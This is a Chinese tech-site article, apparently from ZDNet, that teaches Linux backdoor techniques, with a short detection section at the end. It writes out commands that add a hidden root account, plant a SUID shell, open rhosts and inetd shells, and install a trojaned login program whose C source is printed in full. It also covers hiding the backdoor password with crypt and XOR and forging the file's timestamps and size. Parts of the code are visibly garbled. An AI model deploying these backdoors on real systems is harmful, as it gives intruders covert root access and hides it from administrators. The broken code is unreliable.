Linux后门技术及实践方法谈

ZDNet软件频道 时间:2009-11-04 作者: | 比特网 我要评论()
本文关键词:系统安全 linux安全 Linux
入侵者完全控制系统后,为方便下次进入而采用的一种技术。

  后门简介

  入侵者完全控制系统后,为方便下次进入而采用的一种技术。

  一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。

  常用后门技术

  增加超级用户账号

  破解/嗅探用户密码

  放置SUID Shell

  rhosts + +

  利用系统服务程序

  TCP/UDP/ICMP Shell

  Crontab定时任务

  共享库文件

  工具包rootkit

  可装载内核模块(LKM)

  增加超级用户 # echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd

  # echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

  如果系统不允许uid=0的用户远程登录,还需要增加一个普通用户账号。

  破解/嗅探用户密码

  获得shadow文件后,用John the Ripper 工具破解薄弱的用户密码。安装sniffit等嗅探工具,监听telnet、ftp等端口,收集用户密码。

  放置SUID Shell # cp /bin/bash /dev/.rootshell

  # chmod u+s /dev/.rootshell

  普通用户在本机运行/dev/.rootshell,即可获得一个root权限的shell。 rhosts + +

  # echo "+ +" > /.rhosts

  # rsh -l root victim.com csh -i

  远程可以得到一个rootshell。

  利用系统服务程序

  修改/etc/inetd.conf, daytime stream tcp nowait /bin/sh sh -I ;用trojan程序替换in.telnetd、in.rexecd等inted的服务程序

  重定向login程序

  TCP/UDP/ICMP Shell

  BindShell,大部分是基于TCP/UDP协议的网络服务程序,在高端口监听,很容易被发现。Ping Backdoor,通过ICMP包激活后门,形成一个Shell通道。

  TCP ACK数据包后门,能够穿越防火墙。

  Crontab定时任务

  通过Crontab程序调度已安装的后门程序定时运行,一般在深夜时段,是系统管理员不在线的时间。

  共享库文件

  在共享库中嵌入后门函数使用后门口令激活Shell,获得权限能够躲避系统管理员对二进制文件本身的校验

  工具包rootkit

  包含一系列系统及后门工具:

  ◆清除日志中的登录记录

  ◆伪装校验和

  ◆替换netstat、ps等网络工具

  ◆后门登录程序易于安装和使用

  可装载内核模块(LKM)

  LKM:Loadable Kernel Modules 动态的加载,不需要重新编译内核。

  截获系统调用,具有隐藏目录、文件、进程、网络连接等强大功能。

  自身隐蔽性好,发现难度较大。

  著名的LKM包有adore和knark。

  后门的检测

  以自己的经验,结合特定的工具,手工作一些检测。

  使用Tripwire或md5校验来检查系统。

  借助IDS系统,监听到目标机器的可疑网络连接。

  实例:login后门

  入侵者先把原始的/bin/login备份,再用一段程序替换/bin/login。入侵者telnet登录进来的时候,通过环境变量或者终端类型

  传递了正确的后门密码,将直接获得一个Shell;如果是普通用户登录,将会重定向到原始的login文件,来处理正常的登录。

  最简单的login后门ulogin.c源代码如下:

  实例:login后门 #include

  #define PASSWORD "passWORD"

  #define _PATH_LOGIN "/sbin/logins"

  main (argc, argv, envp)

  int argc;

  char **argv, **envp;

  {

  char *display = getenv("DISPLAY");

  if ( display == NULL ) {

  execve(_PATH_LOGIN, argv, envp);

  perror(_PATH_LOGIN);

  exit(1);

  }

  if (!strcmp(display,PASSWORD)) {

  system("/bin/csh");

  exit(1);

  }

  execve(_PATH_LOGIN, argv, envp);

  exit(1);

  }

  利用后门登录

  首先Telnet服务是打开的,在自己机器上: bash$ export DISPLAY=passWORD

  bash$ telnet victim.com

  Trying xxx.xxx.xxx.xxx...

  Connected to victim.com (xxx.xxx.xxx.xxx).

  Escape character is "^]".

  % _

  strings命令

  strings命令能够打印出二进制文件中的可显示字符串,用于刚才的ulogin程序:

  bash$ strings ulogin

  /lib/ld-Linux.so.2

  ..............

  DISPLAY

  /sbin/logins

  passWORD

  /bin/csh

  加密后门密码

  1,采用DES算法,即crypt( )函数,编写gen.c程序: #include

  main(int argc, char *argv[])

  {

  if (argc != 3) {

  printf("usage: %s ", argv[0]);

  exit(1);

  }

  printf("%s ", crypt(argv[1], argv[2]));

  }

  2、编译为gen,执行./gen hack ui,得到的shadow结果为UiVqMWvDrIQjA。

  3、修改后门源程序ulogin.c:

  -- 以密文形式的密码代替ulogin.c中define的宏PASSWORD值。

  -- 如果后门密码正确,直接给出Shell: if (!strcmp(PASSWORD, crypt(display,PASSWORD)))

  {

  system(SHELL);

  exit(1);

  }

  用strings命令只能看到加密过的密码。

  采用异或(XOR)算法

  以十六进制方式表示字符串,以达到non- printable的效果

  1、编码程序encode.c如下: char magic[]="x71x67x6dx7ax65x61x7a";

  char *de(char *str,char *key)

  {

  int i=0,j=0,len;

  len=strlen(key);

  while(str[i] != "") {

  str[i]^=key[j];

  j++;

  if(j==len) j=0;

  i++;

  }

  return str;

  }

  void display(char *str)

  {

  int i;

  for(i=0;iprintf(" ");

  }

  main()

  {

  char gets[100], *ptr;

  ptr=gets;

  scanf ("%s",ptr);

  de(ptr,magic);display(ptr);

  }

  2、编译程序encode,依次执行得到关键字符串与magic串异或后的结果,例如原始login的文件名/sbin/xlogin,经过异或后为: x5ex14xfx13xbx4ex2x1dx8xax13xb

  3、在后门源代码中这样定义: Char

  login[]="x5ex14xfx13xbx4ex2x1dx8xax13xb";

  然后插入异或函数char *de()结合同一magic串,就能判断出正确的后门密码。

  用strings命令看不到密码、路径等字符串了。

  最后的修饰

  使后门程序ulogin的strings输出类似于正常login的strings输出,做法为:

  在ulogin.c代码中增加一个字符串数组char strings[] ="";,在引号中填入正常login程序的strings输出结果。

  以假乱真,增加迷惑性。

  调整后门程序的文件日期、大小等属性:

  1、日期 # ls -l /sbin/xlogin

  -r-sr-xr-x root root 19300 Feb 11 1998

  /sbin/xlogin

  # touch -t 199802110000 ulogin

  # _

  2、调整大小 # ls -l ulogin /sbin/xlogin

  -r-sr-xr-x root root 7542 Feb 11 1998 ulogin

  -r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin

  # bc

  19300-7542

  11758

  # dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1

  1+0 records in

  1+0 records out

  11758 bytes transferred in 0.000379 secs (31016746

  bytes/sec)

  # cat /tmp/t >> ulogin

  Login后门的检测

  使用命令md5sum对现有/bin/login文件作校验,与以前的值作比较。

  使用Red Hat Linux的RPM校验:

  # rpm -V util-Linux

  在入侵者已经利用后门登录的情况下,who是看不到用户的,查看系统进程,查找login -h xxx.xxx.xxx.xxx的字样。

用户评论
用户名
评论内容
发表时间
ZDNet网友
2011-03-18 14:57:01
ZDNet网友
2010-05-21 00:49:14
ZDNet网友
2010-05-21 00:48:00
ZDNet网友
微软应该对自己的用户负责,如果用户完全使用xp升级微软win7,为什么要付出这样麻烦的代价?都是微软出品软件,且都是利用该软件获取信息以及处理文字、多媒体功能,微软应该尽可能方便用户!虽然有时候这样的请求也许跟不上时代技术发展的脚步,但是微软不要以此为借口,认为一切都理所应当,就不可以方便用户。还是要尽力,所谓拿人手短吃人嘴软,商业不正是讲求有商道吗!至少做人需诚实守信,尽可能帮助用户顺利、安全转换操作系统、各种必须软件功能尽可能兼容以及信息尽可能的少丢失!虽然这很大程度仅仅取决于微软等计算机专家、工程师的自我自律约束,我们普通用户恐怕很难知道微软究竟仅了多大力量为用户考虑,但是我相信真相会有被发现的一天,无论多久远。 微软从某种意义上来说,就是一个类似“掌握魔方”操作特别出神入化的公司。几乎奠定了电脑主要的“规则”,但是,我却相信不久将来我们会发现,电脑依然是非常有限的一个小系统而已!随着我们新的关键材料认知突破,电脑系统会真正被另一个革命性新电脑系统所取代,不要以为我这样的说法是无稽之谈不可实现,我却认为很有可能,只看这样的情况发生究竟是快还是慢,是早还是迟!变成历史的小玩具之后的电脑系统,微软会留下良好的历史声名吗?我们拭目以待! 网友::我爱佛祖
2010-02-03 13:52:55
- 发表评论 -
匿名
注册用户

百度大联盟认证黄金会员Copyright© 1997- CNET Networks 版权所有。 ZDNet 是CNET Networks公司注册服务商标。
中华人民共和国电信与信息服务业务经营许可证编号:京ICP证010391号 京ICP备09041801号-159
京公网安备:1101082134